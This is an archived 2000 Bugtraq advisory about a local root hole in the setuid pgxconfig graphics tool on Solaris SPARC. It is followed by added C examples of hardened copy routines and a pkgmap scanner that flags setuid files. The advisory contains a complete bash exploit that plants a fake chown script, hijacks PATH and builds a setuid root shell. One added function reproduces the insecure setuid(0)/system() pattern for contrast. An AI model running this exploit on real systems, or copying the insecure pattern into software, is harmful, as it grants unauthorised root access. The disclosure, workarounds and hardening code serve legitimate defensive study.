012.txt

02 Aug 2000 00:00:00, reported by Suid. Type: packetstorm. Source: packetstormsecurity.com

Local root vulnerability in PGX Config allows arbitrary command execution on Sun Sparc Solaris systems.

Code

>From [email protected] Wed Aug 2 11:08:46 2000  
Return-Path: <[email protected]>  
Date: Mon, 2 Aug 0100 11:56:57 +0000  
Reply-To: [email protected]  
Sender: Bugtraq List <[email protected]>  
From: [email protected]  
Subject: Local root compromise in PGX Config Sun Sparc Solaris  
To: [email protected]  
  
hi guys and gals  
  
yeah, here's something I have had sitting on the shelf until the vendor sent me a  
fix. They seem to have done that, so here it is. drum roll...  
  
--- Start ---  
  
[email protected] - Raptor GFX config tool local root vulnerability  
  
Short Name: PGXCONFIG-SPARC  
Software: Raptor GFXtra configuration tool - pgxconfig  
URL: http://www.techsource.com  
ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z  
Version: PGX32 (Raptor GFX) X Window System Support v2.3.1  
Platforms:   
Sun Solaris:  
2.5.1 Sparc  
2.6 Sparc  
7 Sparc  
8 Sparc  
  
Type: Multiple. Lack of environment sanity checks. Insufficient  
bounds checking. Insecure use of the /tmp dir.  
Date: 04 July 2000  
  
Summary:  
  
Local users can run arbitrary commands as root.  
  
Background:  
  
Raptor GFX cards are PCI accelerated graphics adapters suitable  
for use in Sun Sparc systems (among others). The associated driver  
and configuration software is distributed for the Sun platform from  
the techsource.com website.  
  
Vulnerability:  
  
The configuration tool associated with this product is called  
pgxconfig and is installed in /usr/sbin mode 4555 by default.  
  
Extract from pkgmap:  
1 d none sbin 0775 root bin  
1 s none sbin/GFXconfig=pgxconfig  
1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098  
  
With this command it is possible for any user on the system to  
change the openwin configuration. The way this program does  
this is by using system("cp ..."); to copy the existing configuration  
to a backup before overwriting the configuration with  
a new file. Now, Solaris's /bin/sh (which system() invokes to run  
the command line) does NOT keep root privileges when the real uid  
is >= 100 and differs from the effective uid: it drops the effective  
uid back to the real one. However, this particular version of  
pgxconfig does a nice setuid(0); for us. So, while we had euid = 0 from  
being executed as a suid root program, we now have uid = 0 as well, the  
shell has nothing to drop, and system() will execute whatever it's told to, as root.  
  
In this particular program, system is used badly and two things are  
going on.  
  
1. root privileges are not dropped  
2. the environment is not sanitised  
  
Without source I can't show you exactly what's going on in there, but the  
result is obviously insecure.  
  
It's worth noting here (and demonstrating in the exploit) that the  
use of system("cp /whatever /wherever"); isn't the only system()  
call worth exploiting. I've used the easiest one in my exploit  
below.  
  
Other problems noted but not investigated were multiple command  
line options lacking proper bounds checking and predictable temp  
file creation. It would be a good idea for the vendor to  
perform a complete audit on this product.   
  
Exploit:  
---------------------------CUT---------------------------  
#!/usr/local/bin/bash  
  
# TechSource Raptor GFX configurator root exploit  
# [email protected]  
  
# unfortunately a compiler must be installed to use this example  
# exploit. however there's a million ways around this you know  
  
# on my system, gcc isn't in my path  
PATH=$PATH:/usr/local/bin  
  
# build a little prog, nothing new here folks: a setuid shell launcher  
echo '#include <stdio.h>' > ./x.c  
echo '#include <unistd.h>' >> ./x.c  
echo 'int main(void) { setuid(0); setgid(0); execl("/bin/sh", "/bin/sh", "-i", (char *)0); return 0; }' >> ./x.c  
gcc x.c -o foobar  
rm -f ./x.c  
  
# build a substitute chown command. i much prefer this over  
# regular chown. pgxconfig runs "chown" via system() with uid 0 and an  
# unsanitised PATH, so this script is what actually gets executed, as root  
echo "#!/bin/sh" > chown  
echo "/usr/bin/chown root ./foobar" >> chown  
echo "/usr/bin/chmod 4755 ./foobar" >> chown  
chmod 0755 chown  
  
# oooh look it's the magical fairy path variable: current dir is searched first  
export PATH=.:$PATH  
  
# here's one way to skin a cat  
# (there's more, some need valid devices. exercise for the readers)  
/usr/sbin/pgxconfig -i  
rm -f chown  
  
# foobar is now setuid root; run it for a root shell  
./foobar  
  
----------------------------END--------------------------  
  
Fix:  
  
No source, no fix. A workaround is:  
  
Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both)  
or at least remove the suid bit. Note from the pkgmap above that  
GFXconfig is a symlink to pgxconfig, so changing the mode of  
pgxconfig covers both names.  
  
# chmod 0 /usr/sbin/pgxconfig  
  
or  
  
# chmod 0511 /usr/sbin/pgxconfig  
  
The first makes the program unusable until the mode is restored; the  
second keeps it executable but without set-uid, so it only runs with  
root privileges when root runs it. Use one of these until your vendor  
can issue a fix.  
  
Greets:  
  
duke - r0x j00r s0x  
cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz  
yowie - elite greet wh0re  
ratcorpse + par - congrats dudes  
anyone i met at defcon 8 / black hat briefings  
  
Thumbs Down:  
  
Network Solutions - assholes  
  
http://www.suid.edu/advisories/012.txt  
  
--- EOF ---  
  
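The pattern the advisory describes (raise the real uid to 0, then hand a shell a command line whose program name is resolved through the caller's PATH) is easiest to see next to its fix. The following is an added example, not code from the suid.edu advisory or from TechSource: backup_insecure() is the shape of the bug, backup_hardened() replaces the shell with fork/execve on an absolute path, a fixed environment and the invoking user's real uid/gid, and copy_in_process() removes the subprocess entirely. Function names are hypothetical, the config content in demo_roundtrip() is constructed, and it assumes a POSIX system with /bin/cp.

```c
/* Added example, not code from the suid.edu advisory or from TechSource:
 * the system("cp ...") pattern the advisory describes, shown beside two
 * hardened replacements. Function names are hypothetical; the sample
 * config content in demo_roundtrip() is constructed. Assumes a POSIX
 * system with /bin/cp. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* The insecure pattern (shown for contrast, never called here): real uid
 * raised to 0, then a shell resolves "cp" through the caller's PATH. */
int backup_insecure(const char *src, const char *dst)
{
    char cmd[512];
    (void)setuid(0);                 /* ruid = 0: /bin/sh keeps root */
    snprintf(cmd, sizeof cmd, "cp %s %s", src, dst);
    return system(cmd);              /* "cp" may be ./cp; args may carry ; | ` */
}

/* Hardened replacement 1: no shell, absolute path, fixed environment,
 * child runs as the invoking user's real uid/gid. */
int backup_hardened(const char *src, const char *dst)
{
    static char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
        execve("/bin/cp", argv, envp);
        _exit(127);                  /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened replacement 2: do the copy in-process, no subprocess at all. */
int copy_in_process(const char *src, const char *dst)
{
    int in = open(src, O_RDONLY);
    if (in < 0) return -1;
    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (out < 0) { close(in); return -1; }
    char buf[4096];
    ssize_t n;
    while ((n = read(in, buf, sizeof buf)) > 0) {
        for (ssize_t off = 0; off < n; ) {
            ssize_t w = write(out, buf + off, (size_t)(n - off));
            if (w < 0) { close(in); close(out); return -1; }
            off += w;
        }
    }
    close(in);
    return (close(out) == 0 && n == 0) ? 0 : -1;
}

static int same_contents(const char *path, const char *expected)
{
    char buf[256];
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    ssize_t n = read(fd, buf, sizeof buf);
    close(fd);
    return n == (ssize_t)strlen(expected) && memcmp(buf, expected, (size_t)n) == 0;
}

/* Round trip: write a constructed config, back it up both hardened ways,
 * verify the copies. Returns 1 on success, 0 on any failure. */
int demo_roundtrip(void)
{
    static const char sample[] = "# constructed OWconfig sample\nclass=\"XSCREEN\" name=\"pgx0\"\n";
    char src[] = "/tmp/owcfg.XXXXXX", a[] = "/tmp/owbak1.XXXXXX", b[] = "/tmp/owbak2.XXXXXX";
    int fs = mkstemp(src), fa = mkstemp(a), fb = mkstemp(b);
    if (fs < 0 || fa < 0 || fb < 0) return 0;
    close(fa); close(fb);
    int ok = write(fs, sample, sizeof sample - 1) == (ssize_t)(sizeof sample - 1);
    close(fs);
    ok = ok && copy_in_process(src, a) == 0 && same_contents(a, sample)
            && backup_hardened(src, b) == 0 && same_contents(b, sample);
    unlink(src); unlink(a); unlink(b);
    return ok;
}

int main(void)
{
    printf("hardened backup round trip: %s\n", demo_roundtrip() ? "ok" : "FAILED");
    return 0;
}
```

Of the two replacements, copy_in_process() is the one to prefer in a set-uid tool: it leaves no program name, PATH, IFS or shell metacharacter for an unprivileged caller to influence, which is exactly the surface the exploit above uses.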

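The advisory's pkgmap extract is what tells you the binary ships mode 4555, and the workaround is to clear that bit. The following is an added example, not part of the suid.edu advisory or of Sun's packaging tools: it parses pkgmap lines (field order per pkgmap(4): part, ftype, class, path, mode, owner, group, then optional size, checksum and modtime) and flags every regular, editable or volatile file with the setuid or setgid bit, so the same check can be run over a whole package rather than the one file named here. SAMPLE_PKGMAP contains the three lines quoted in the advisory plus two constructed entries; struct and function names are hypothetical, and the printed chmod assumes BASEDIR is /usr as the advisory states.

```c
/* Added example, not part of the suid.edu advisory or of Sun's packaging
 * tools: scan pkgmap entries for set-uid/set-gid files, so the workaround
 * (clearing the suid bit) can be checked against every file a package
 * installs rather than only the one named in the advisory. Field order is
 * pkgmap(4): part ftype class path mode owner group [size cksum modtime].
 * SAMPLE_PKGMAP holds the three lines quoted in the advisory plus two
 * constructed entries; struct and function names are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

struct priv_entry {
    char path[256];
    char owner[32];
    unsigned mode;
    int setuid, setgid;
};

/* One pkgmap line. Returns 1 (and fills *e) only for a regular (f),
 * editable (e) or volatile (v) file carrying the setuid or setgid bit.
 * Headers (": 1 1200"), directories and symlinks return 0. */
int pkgmap_privileged_entry(const char *line, struct priv_entry *e)
{
    int part;
    char ftype, class[32], group[32];
    if (sscanf(line, "%d %c %31s %255s %o %31s %31s",
               &part, &ftype, class, e->path, &e->mode, e->owner, group) != 7)
        return 0;
    if (ftype != 'f' && ftype != 'e' && ftype != 'v')
        return 0;
    e->setuid = (e->mode & S_ISUID) != 0;
    e->setgid = (e->mode & S_ISGID) != 0;
    return e->setuid || e->setgid;
}

/* Scan newline-separated pkgmap text. Returns the number of flagged entries
 * stored in out (at most max). */
int pkgmap_scan(const char *text, struct priv_entry *out, int max)
{
    int n = 0;
    const char *p = text;
    while (*p && n < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (pkgmap_privileged_entry(line, &out[n])) n++;
        p = nl ? nl + 1 : p + strlen(p);
    }
    return n;
}

/* First four lines are from the advisory's pkgmap extract; the last two
 * are constructed to show a harmless 0755 file and a setgid file. */
const char SAMPLE_PKGMAP[] =
    ": 1 1200\n"
    "1 d none sbin 0775 root bin\n"
    "1 s none sbin/GFXconfig=pgxconfig\n"
    "1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098\n"
    "1 f none bin/pgxinfo 0755 root bin 12345 1111 934907098\n"
    "1 f none lib/pgxhelper 2755 root sys 2222 3333 934907098\n";

struct priv_entry found[16];

/* Run the scan over the sample; returns the count so callers can inspect found[]. */
int demo_scan(void)
{
    return pkgmap_scan(SAMPLE_PKGMAP, found, 16);
}

int main(void)
{
    int n = demo_scan();
    for (int i = 0; i < n; i++)   /* BASEDIR assumed to be /usr */
        printf("%s mode %04o owner %s -> chmod u-s,g-s /usr/%s\n",
               found[i].path, found[i].mode, found[i].owner, found[i].path);
    return 0;
}
```

Run against a real /var/sadm/pkg/&lt;pkg&gt;/pkgmap (or the pkgmap inside the vendor tarball) this lists every privileged file the package would install; the symlink entry is skipped on purpose, since GFXconfig inherits whatever mode pgxconfig has.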